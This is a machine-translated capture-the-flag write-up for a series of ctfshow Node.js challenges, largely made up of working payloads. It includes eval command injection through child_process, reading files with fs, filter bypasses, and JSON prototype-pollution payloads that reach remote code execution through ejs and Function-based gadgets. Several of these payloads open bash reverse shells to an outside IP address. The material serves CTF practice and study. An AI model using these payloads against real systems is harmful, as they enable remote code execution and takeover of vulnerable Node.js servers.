Preface

Read the document first

Node.js course | Novice tutorial (runoob.com)

Common loopholes

Node.js Learning and summary of common vulnerabilities - The prophet community (aliyun.com)

nodejs Some introductory features && actual combat - The prophet community (aliyun.com)

Prototype chain pollution

In depth understanding of JavaScript Prototype Pollution attack | Farewell song (leavesongs.com)

template engine rce

XNUCA2019 Hardjs Answer key From prototype chain contamination to RCE - The prophet community (aliyun.com)

Further exploration JavaScript Prototype chain contamination to RCE - The prophet community (aliyun.com)

How many? node Prototype chain pollution analysis of template engine | L0nm4r (lonmar.cn)

ctfshow nodejs piece - TARI TARI

334

Capitalize operation

Pass to lowercase ctfshow 123456 that will do

335-336- System commands

Node.js Medium chile_process.exec It's called /bash.sh, It's a bash Interpreter , Can execute system commands .
 stay eval Function parameters can be constructed require('child_process').exec(''); To make the call .

It turns out to be [object Object]

To view the document ：

child_process Subprocesses | Node.js API file (nodejs.cn)

Find out exec The return is

By finding all alternative uses execSyncspawnSync

spawnSync():

Payload:

 Law 1 ： System commands 
?eval=require('child_process').execSync('ls').toString();
?eval=require('child_process').spawnSync('cat',['fl00g.txt']).output;
?eval=require('child_process').spawnSync('cat',['fl00g.txt']).stdout;
?eval=global.process.mainModule.constructor._load('child_process').exec('ls');

 Law two ：
 File operations 
?eval=require('fs').readdirSync('.');
?eval=require('fs').readFileSync('fl001g.txt');

Node.js File system module (nodejs.cn)

 Law three   Splicing 
'+'  want urlencode once 
?eval=var a="require('child_process').ex";var b="ecSync('ls').toString();";eval(a%2Bb); 
?eval=require('child_process')['ex'%2B'ecSync']('cat f*')

367-md5

var express = require('express');
var router = express.Router();
var crypto = require('crypto');

function md5(s) {
    
  return crypto.createHash('md5')
    .update(s)
    .digest('hex');
}

/* GET home page. */
router.get('/', function(req, res, next) {
    
  res.type('html');
  var flag='xxxxxxx';
  var a = req.query.a;
  var b = req.query.b;
  if(a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag)){
    
  	res.end(flag);
  }else{
    
  	res.render('index',{
     msg: 'tql'});
  }
  
});

module.exports = router;

Array bypassing ?a[]=1&b[]=1

368- Prototype chain pollution

router.post('/', require('body-parser').json(),function(req, res, next) {
    
  res.type('html');
  var flag='flag_here';
  var secert = {
    };
  var sess = req.session;
  let user = {
    };
  utils.copy(user,req.body);
  if(secert.ctfshow==='36dboy'){
    
    res.end(flag);
  }else{
    
    return res.json({
    ret_code: 2, ret_msg: ' Login failed '+JSON.stringify(user)});  
  }
});

There's one in front copy function , Can be linked to the merge Functional analogy

Pollution user Give Way secert.ctfshow by 36dboy

Payload：

{"username":"1","password":"1","__proto__":{"ctfshow":"36dboy"}}

339

Here let me enter flag So I can't use it directly

Unanticipated

ejs rce

Ejs The engine can rce , Refer to the link above for the specific process

Payload：

{"__proto__":{"outputFunctionName":"_tmp1;global.process.mainModule.require('child_process').exec('bash -c \"bash -i >& /dev/tcp/xxx/6666 0>&1\"');var __tmp2"}}

Pollution first outputFunctionName

Visit call rendering , rebound shell

The expected solution

Pollution query Parameters recycling Function rebound shell

The pollution point is user Trigger point at query
/login Lower pollution query

/api Next trigger query

Payload：

{"__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/150.158.181.145/2334 0>&1\"')"}}

340

The trigger point is still query
But the pollution point is different

user.userinfo Up to two levels of pollution is Object object

payload：

{"__proto__":{"__proto__":{"query":"return global.process.mainModule.constructor._load('child_process').exec('bash -c \"bash -i >& /dev/tcp/150.158.181.145/2334 0>&1\"')"}}}

341

be without api Then use ejs Of rce

342-343

Refer to the foreword template for specific process analysis rce

payload:

{"__proto__":{"__proto__":{"type":"Code","self":1,"line":"global.process.mainModule.require('child_process').execSync('bash -c \"bash -i >& /dev/tcp/150.158.181.145/2333 0>&1\"')"}}}

content-type To be changed to application/json

344

router.get('/', function(req, res, next) {
    
 res.type('html');
 var flag = 'flag_here';
 if(req.url.match(/8c|2c|\,/ig)){
    
 	res.end('where is flag :)');
 }
 var query = JSON.parse(req.query.query);
 if(query.name==='admin'&&query.password==='ctfshow'&&query.isVIP===true){
    
 	res.end(flag);
 }else{
    
 	res.end('where is flag. :)');
 }

});

namely url Cannot contain case 8c、2c and comma

nodejs The parameter with the same name will be stored as an array , also JSON.parse It can be parsed normally

paylaod:

?query={"name":"admin"&query="password":"%63tfshow"&query="isVIP":true}

quotes url Encoded as %22 And c formation %22c Matches a regular , So code c